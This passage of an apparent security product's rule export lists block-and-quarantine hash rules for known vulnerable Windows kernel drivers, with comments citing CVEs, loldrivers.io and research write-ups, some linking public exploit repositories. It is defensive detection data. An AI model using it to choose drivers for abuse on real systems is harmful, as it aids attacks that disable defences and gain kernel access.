"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e02357b-1664-56cb-b1b9-effe08dcd95a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820086Z", + "creation_date": "2026-03-23T11:45:30.820089Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820096Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b6251a1883c5ed03ecdead8322e7d8105d075fef160abfe763d5873484b2a27", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e096492-1e83-521b-a177-21d1afc6687c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972595Z", + "creation_date": "2026-03-23T11:45:29.972596Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0e25b879d830e4f867b09d6540a664b6f88bad353cd14494c33b31a8091f605", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e0b8d47-61f1-50c3-89ab-dff32d62b19b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143798Z", + "creation_date": "2026-03-23T11:45:32.143800Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7326aefff9ea3a32286b423a62baebe33b73251348666c1ee569afe62dd60e11", + "comment": "Vulnerable Kernel Driver (aka ACE-BASE.sys) [https://www.loldrivers.io/drivers/ff77b58d-e143-4f61-92de-c0d9bc0af7d5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e2dfd73-268e-53d1-bfdd-5a4de544a39e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822465Z", + "creation_date": "2026-03-23T11:45:31.822468Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"3bbfdefb8c8a7d0e7b0480ec06ad01b65ef056aea7e4fa2f0e8771e419a06b56", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e32aa28-50b7-50c4-9272-022994920873", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608492Z", + "creation_date": "2026-03-23T11:45:29.608494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608499Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7539157df91923d4575f7f57c8eb8b0fd87f064c919c1db85e73eebb2910b60c", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e352c2f-4a29-5b28-91d7-635b79f954a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453813Z", + "creation_date": "2026-03-23T11:45:30.453817Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453825Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "516e39dcf7480de4bb86727321c099605a34a54f1d5b3a4aa6dc4bcf260274c9", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e448bed-2862-5091-b10f-6fa28a072e9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818161Z", + "creation_date": "2026-03-23T11:45:31.818164Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818172Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa3ebaa9faedddbeae1a80cc1953e79d1f6fae716e5f374f5bdf08015491a56e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e44b3a9-1542-5155-bc68-7b7f5b75118c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974143Z", + "creation_date": "2026-03-23T11:45:29.974145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974151Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee3ff12943ced401e2b6df9e66e8a0be8e449fa9326cab241f471b2d8ffefdd7", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e488398-47e6-5fff-b179-c128384c7dc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827103Z", + "creation_date": 
"2026-03-23T11:45:31.827105Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827111Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "624209252a70280a29d50cea1bed6f118a73b6558480659efb0bbad5c833ac8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1e5827c0-508a-5997-85c0-f31ad87a265f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618841Z", + "creation_date": "2026-03-23T11:45:29.618843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618849Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48567fa742841208d4f93f54031218703241baec6f59b1e4ab8a71c26de1cf85", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e6ce154-d886-51ed-acde-19aa0a7f6453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144322Z",
+ "creation_date": "2026-03-23T11:45:31.144324Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144330Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba164f28ac3703908f8b0e61f11a79eb5100bddbea25c4c89b1072b645434734",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e6df447-77bd-511e-b40f-1df267127b3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452187Z",
+ "creation_date": "2026-03-23T11:45:30.452190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": 
true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b617a072c578cea38c460e2851f3d122ba1b7cfa1f5ee3e9f5927663ac37af61",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e8a1f4b-3cd2-5790-bfcd-56eeed9ca8c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817523Z",
+ "creation_date": "2026-03-23T11:45:30.817525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b84dc9b885193ced6a1b6842a365a4f18d1683951bb11a5c780ab737ffa06684",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e8e0530-5ce1-5e53-9fa0-28da7970fd31",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ 
"rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145765Z",
+ "creation_date": "2026-03-23T11:45:31.145767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2279f01c81a67657cc33fde99b28d968c34228e6422a90b3ba9ed91b9f66ec9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e91be74-901b-578e-80b0-ebc824923841",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975237Z",
+ "creation_date": "2026-03-23T11:45:29.975239Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": 
"hash",
+ "value": "f05359fe5793e947711c72cc8413e3b1d96c8a54eaafe4803827c4414f2f8e85",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e9861ad-bac2-53fc-ae1c-038cebb2487f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810503Z",
+ "creation_date": "2026-03-23T11:45:31.810505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3a27a487d55d95821df5a311b44942cb18cfb7b917530d73b08f41e25cf218c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1e9f3bf4-6626-55a2-9d5d-bb40c4bdeaa3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": 
"critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147150Z",
+ "creation_date": "2026-03-23T11:45:32.147152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78ccae1341d6546c9d238e824a2261a961bd9a843f6d951d649fbc09ad0e01a0",
+ "comment": "Vulnerable Kernel Driver (aka BdApiUtil64.sys) [https://blog.talosintelligence.com/byovd-loader-deadlock-ransomware/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eab2acf-25ab-5817-81e0-b0a2dc584930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615554Z",
+ "creation_date": "2026-03-23T11:45:29.615557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"5eb233ed9df3c1def326e2c63ee304dc85af303f8c9f038c993aa6e34f91ffaf",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eadbae6-1e01-5f4f-b9d7-fcdfbbb84d8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160012Z",
+ "creation_date": "2026-03-23T11:45:31.160014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2f12442e3b9d2ba640de7f353f6567d960a9fb5a17cc3c9be886541aefc94ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eaeed44-9666-5c7d-81d2-dfe85b641634",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ 
"id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617254Z",
+ "creation_date": "2026-03-23T11:45:29.617256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7188af66fe23bd8cf27f003ad6c7550cdb6faa5c948fe7c3b1435c9246345eb3",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eb38bbc-69c3-522a-b5e8-9df7c0dce3de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480295Z",
+ "creation_date": "2026-03-23T11:45:30.480298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a228c751d1664b362f10dc7083c223995b976b264da8b7380c51157bed66fbe",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eca7b23-9882-5ff0-8682-ec354a9c847c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455024Z",
+ "creation_date": "2026-03-23T11:45:30.455027Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455036Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16e68d2fa75a4e04872be42e2b54c041e43ab3409096741690520417e3368aa6",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ecd3c0e-37e8-57c6-8871-dfe65076f60b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621037Z",
+ "creation_date": "2026-03-23T11:45:29.621039Z",
+ "enabled": true,
+ 
"block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162",
+ "comment": "Fujitsu Vulnerable Physmem drivers (aka ADV64DRV.sys) [https://www.loldrivers.io/drivers/24fb7bab-b8c3-46ea-a370-c84d2f0ff614/] [file SHA256]",
